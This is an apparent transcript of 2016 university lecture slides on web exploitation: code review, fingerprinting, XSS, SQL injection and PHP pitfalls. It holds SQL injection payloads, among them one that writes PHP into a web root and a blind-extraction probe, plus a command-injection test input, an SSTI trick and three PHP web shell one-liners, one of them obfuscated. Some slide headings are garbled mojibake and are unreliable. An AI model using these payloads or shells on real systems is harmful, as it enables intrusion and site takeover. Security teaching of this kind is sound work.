Web Security - Exploits

October 14, 2016

Web Security - Exploits

2016/Computer Security at National Taiwan University of Science and Technology (NTUST)


Inndy

October 14, 2016

Transcript

  1. Computer Security at NTUST — Inndy (inndy.tw@gmail.com) — Web Security: Exploits

  2. Outline • Bug and Vulnerability • Common Type of Vulnerability in Web • Vulnerability Hunting • Common Vulnerabilities •

    XSS • SQL Injection
  3. Bug & Vulnerability

  4. Bug: Your application crashed

  5. Vulnerability: It's an exploitable bug

  6. Web Security

  7. :,5b pR7 A½ R7 DNS R7 Webc' R7 Webâ R7

    *½ˆ– R7 Webèd ¬R7 ‘£Û R7 @fv¡ R7 XSS XXE SQL Injection CSRF 齡❉ Web Hacking ⚥涸㣼䪮帱䊫 by Orange https://goo.gl/vSOcQh
  8. System Security

  9. :,5b pR7 A½ R7 DNS R7 Webc' R7 Webâ R7

    *½ˆ– R7 Webèd ¬R7 ‘£Û R7 @fv¡ R7 Struts2 OGNL RCE Rails YAML RCE XSS UXSS Padding Oracle Padding Oracle XXE DNS Hijacking SQL Injection ShellShock FastCGI RCE NPRE RCE CSRF Bit-Flipping Attack 齡❉ Web Hacking ⚥涸㣼䪮帱䊫 by Orange https://goo.gl/vSOcQh
  10. Common Type of Vulnerability in Web App • Logic Error • Race Condition, (OWASP A7) Missing Function Level Access Control • Injection • SQL Injection,

    XSS, XXE Injection, Cmd Injection, … • Memory Corruption • unserialize() in PHP (case study) • Denied of Service • Regex DoS, Logic Bug leads to Infinity Loop
  11. Vulnerability Hunting • Whitebox Test • Code Review • Blackbox Test • Guess and try to inject something to your input fields •

    Graybox Test • Whitebox + Blackbox test, when you have partial of source code or other version of source code
  12. Whitebox Test • How? • Read the f**king code • Read the f**king code

    • Read the f**king code • and so on
  13. Whitebox Test: Essential Skills & Tools • Can you read this language? Are you completely know this language? • If not, learn it and master it • Command line tools or your favorite modern text editor

    • Some super cool utils like • grep, awk, sed, find • Modern text editor, but not notepad (without ++) • Sublime Text, Visual Studio Code, Notepad++
  14. Whitebox Test: Language feature • What's wrong with these code? • /* PHP */
 if(!strcmp($_POST['password'], "the

    secret password"))
 {
 echo "You are in!\n";
 } • # shell script
 cd "/home/$USER/data" && zip backup.zip *
  15. Whitebox Test: Language feature

  16. Whitebox Test: Language feature

  17. Whitebox Test: Language feature

  18. Whitebox Test: Language feature

  19. Whitebox Test: Language feature (HITCON CTF, over there)

  20. Whitebox Test • Use regular expression to locate something looks dangerous • egrep '(system|fwrite|danger_func)\(.*\$\w+.*\)' -r . • ack-grep is a good tool

    • ack --php '(new )?mysqli?_connect'
  21. Regular Expression: ^ABC — Line starts with ABC; DEF$ — Line ends with DEF; A+ — One A to infinity A; A* — Zero to infinity A; A? —

    Zero or one A; (ABC|DEF)? — ABC or DEF or nothing; \w — Alphabet, Digits, Underline; . — Any character; [i-k3-5OAQ] — One of i, j, k, 3, 4, 5, O, A, Q
  22. Regular Expression: (system|fwrite|danger_func)\(.*\$\w+.*\) — one of system, fwrite, danger_func; the ( character; any string, any length; the $ character;

    character [A-Za-z_]
  23. Whitebox Test (PHP) • Keep an eye on the code with these functions • execute shell command: system, exec, passthru, backquote •

    sql query: mysql_query, mysqli query, PDO execute • file upload: move_uploaded_file, $_FILES • file inclusion: require, require_once, include, include_once • file operation: fopen, unlink, file, copy, rename • session management: $_COOKIE, $_SESSION, session_start
  24. Whitebox Test (ASP.NET / .NET MVC) • Keep an eye on the code with these functions • execute shell command: Process.Start, CreateProcess • sql query: CommandText

     • file upload: Request.Files, PostedFile • file operation: File.*, FileSystem.* • session management: Session
  25. Blackbox Test • Try to injection something to any possible input field • HTTP header • X-Forwarded-For • User-Agent •

    POST body • GET parameter • cookie
  26. Blackbox Test • What to inject? • ?q=security bug • ?q[]=security bug

    • q=' or … • q=`ls -al` • q=&lt;script&gt;alert(…)&lt;/script&gt;
  27. Imagination and Creative is your power

  28. Whitebox VS Blackbox • Blackbox method can quickly detect some vulnerability • SQL Injection, Cmd Injection, Whatever Injection, XSS, etc •

    Most of OWASP Top 10 can be detected • But not good at logic bug, crypto fails • Whitebox method can find all bug and vulnerability • Infinity time, infinity bug • It's very hard to dig vulnerability in complex and huge system
  29. Graybox Testing • We read code and try to injection something • Sometimes we don't have full source code, or only older version is available (leaked) • OWASP Top 10 is easy to detect, find it first

  30. Collect Information

  31. Collection Information • What are we interested? • What technology stack are our target used? • Undocumented / unlisted URL / API •

    Full path disclosure • Version control system may cause to source code leakage • SSL Certificate
  32. Fingerprinting

  33. Fingerprinting • Figure out technology stack are your target using • Language • Framework • Version •

    OS • HTTP Server
  34. Fingerprinting: HTTP Response $ curl -I http://eyny.com/ HTTP/1.1 302 Found X-Powered-By: PHP/5.2.17

    Location: http://www67.eyny.com/index.php Content-type: text/html Date: Wed, 12 Oct 2016 16:32:22 GMT Server: Apache/2.0.59 — Pretty old PHP version, about [n] years old
  35. Fingerprinting: HTTP Response $ curl -I -k https://stu255.ntust.edu.tw/ntust_stu/stu.aspx HTTP/1.1 200 OK Date:

    Thu, 13 Oct 2016 03:10:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 93 — Windows Server 2003, .NET Framework 1.1
  36. Fingerprinting: PHP • http://www.psc.ntu.edu.tw/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 • X-Powered-By: PHP/.*

  37. Fingerprinting: Rails

  38. Path Disclosure • http://whatever.com/robots.txt • Tell search engine to not to search some path • Sometimes it reveals where is admin panel or config file

  39. Error Message: Full Path Disclosure • Some website shows its error message to user • It may leak some code and file path, or even worse • Google hacking: PDO::__construct, mysql •

    Convert a normal GET parameter to array by inject []
  40. Error Message: Full Path Disclosure

  41. Error Message: Full Path Disclosure

  42. SSL Certificate: How does it works • Asymmetric Cryptography: Pubkey, Privkey • Encrypt with Pubkey, decrypt with Privkey • Encrypt with Privkey, decrypt with Pubkey (a textbook-RSA simplification of signing)

    • We call this signing • Every certificate has a asymmetric crypto key • You can use a cert to sign another cert • Your computer has some built-in root cert, we call it CA • You trust one CA, then you trust the certs signed by it
  43. SSL Certificate: In a certificate • The most important field is called common name (CN) • x509 v3 format support Subject Alternative Name feature that allow you put different domain in one cert

  44. SSL Certificate

  45. Version Control System • Sometimes, you open FileZilla and drag entire folder to server • .svn • .git • What contains in a .git repository?

     • A tool to download .git from HTTP server • https://github.com/denny0223/scrabble
  46. Common Vulnerabilities

  47. XSS • HTML Injection, JavaScript Injection • Close current attribute / tag and inject some script • &lt;img src="http://imgur.com/{ID}.png"&gt; • &lt;p class="msg"&gt;{MESSAGE}&lt;/p&gt;

    • Two Types • Reflected XSS: XSS payload from the input fields • Stored XSS: XSS payload stored on the server
  48. XSS • How to defense? • Remove all html tags from user input • HTML entity encode (encode at output time, for the context the value lands in — HTML body, attribute, JavaScript or URL — since stripping tags alone misses attribute and script contexts)

  49. XSS Real case: limited length XSS • Real case in AIS3 Scoreboard, from Korean BoB project lecturer • https://…vul…security…ntust…/limited-xss (URL separators lost in the transcript)

  50. SQL Injection • Concat input fields and SQL statement without proper sanitize

  51. SQL Injection Exploits • SELECT * FROM users WHERE
 name = '{$USR}'

    AND password = '{$PWD}' • payload => ' or 2 <3# • result => SELECT * FROM users WHERE
 name = '' or 2 <3 #' AND password = 'asjdf'
  52. SQL Injection Exploits • SELECT * FROM users WHERE
 name = '{$USR}'

    AND password = '{$PWD}' • payload => ' UNION SELECT 1, 2, 3# • result => SELECT * FROM users WHERE
 name = '' UNION SELECT 1,2,3
 #' AND password = 'asjdf' — UNION SELECT
  53. SQL Injection Exploits • SELECT * FROM users WHERE
 name = '{$USR}'

    AND password = '{$PWD}' • payload => ' UNION SELECT 1,2,'<?php //bad' INTO 
 OUTFILE '/var/www/index.php'# • result => SELECT * FROM users WHERE
 name = '' UNION SELECT 1,2,'<php //bad' INTO
 OUTFILE '/var/www/index.php'
 #' AND password = 'asjdf' — INTO OUTFILE
  54. SQL Injection Exploits • SELECT * FROM users WHERE
 name = '{$USR}'

    AND password = '{$PWD}' • payload => ' OR ASCII(SUBSTR(name, 1, 1)) > 64 # • result => SELECT * FROM users WHERE
 name = '' OR ASCII(SUBSTR(name, 1, 1)) > 64
 #' AND password = 'asjdf' — Blind Injection
  55. SQL Injection Exploits • INSERT INTO users (id, name, password, is_admin)
 VALUES

    (NULL, '{$USR}', '{$PWD}', 0); • payload => inndy', 'pass', 1) # • result => INSERT INTO users
 (id, name, password, is_admin)
 VALUES (NULL, 'inndy', 'pass', 1) #', 'xxx', 0); — Insert
  56. SQL Injection Exploits: Demo sqlmap advanced usage

  57. SQL Injection Exploits • Think one million times before exploit a wild SQLi vul • Think about it, if SQL statement looks like below • DELETE FROM article

    WHERE id = '{$ID}'; • UPDATE SET nickname = '{$NICK}' WHERE id = '{$ID}';
  58. SQL Injection Exploits — Well, It's a UPDATE / DELETE statement

  59. SQL Injection: True Tragic Story — Someday, fb.com/groups/NTUhead…

  60. SQL Injection: True Tragic Story

  61. SQL Injection: True Tragic Story

  62. SQL Injection Exploits • Yet another true story • About MapleStory private server

  63. Other Vulnerability / Misc

  64. Bad Encoding

  65. UTF-8: The bad char

  66. Bad Encoding • When you try decode some bytes data to unicode, invalid bytes sequence will be convert to unicode \ufffd • \xEF\xBF\xBD in UTF-8 • It may cause some trouble

  67. OpenCTF: Misc random dumb • https://gist.github.com/Inndy/[gist id lost in transcript] • /* TL; DR */
 var x

    = genearte_random_bytes(); // Buffer
 x = String.fromCharCode(x.length) + x; // String + Buffer = String
 var token = Base64.encode(x);
  68. WTF PHP

  69. WTF PHP: Equality • md5('QNKCDZO') == md5('240610708') (both hashes start with "0e", so a loose == compares them as numbers and they are equal)

  70. WTF PHP: unserialize • Class::__wakeup • Class::__destruct • unserialize sucks: use-after-free in unserialize • Never, Ever unserialize something from untrusted source

    • Use JSON
  71. WTF PHP: extract • Default behavior is overwrite all existed variables • extract(…) on $stmt->query / fetchColumn results, it's very common

  72. WTF PHP: password_hash • password_hash("passw\0rd", PASSWORD_DEFAULT) • null byte truncation while hashing password

  73. WTF PHP: argument type • if (strcmp($_GET['password'], $password) …) echo 'Pass'

  74. Server Side Template Injection

  75. SSTI • It's the age of MVC • Bug bounty: Jinja2 SSTI in Uber, reported by Orange • Trendy in CTFs • SSCTF: FlagMan

    • SECUINSIDE: SBBS • HITCON CTF: SecurePost • Sandbox mechanism in many template engine • Simple Trick: [].__class__.__mro__[…].__subclasses__()
  76. SSTI • Exploit unpickle (unserialize) in Python • Exploit file …, then config.from_pyfile

  77. )PXUPXSJUFB1)1XFCTIFMM ˙ 5SJWJBM • <?php system($_GET['cmd']); ?> ˙ "MJUUMFDPOGVTF •

    <?php $_REQUEST[a]($_REQUEST[b]); ?> ˙ )FSFJTNZGBWPSJUF TIBSFXJUIZPV • <?php $a55="\x61ss"."ert";$a55($_REQUEST["a"]); ?>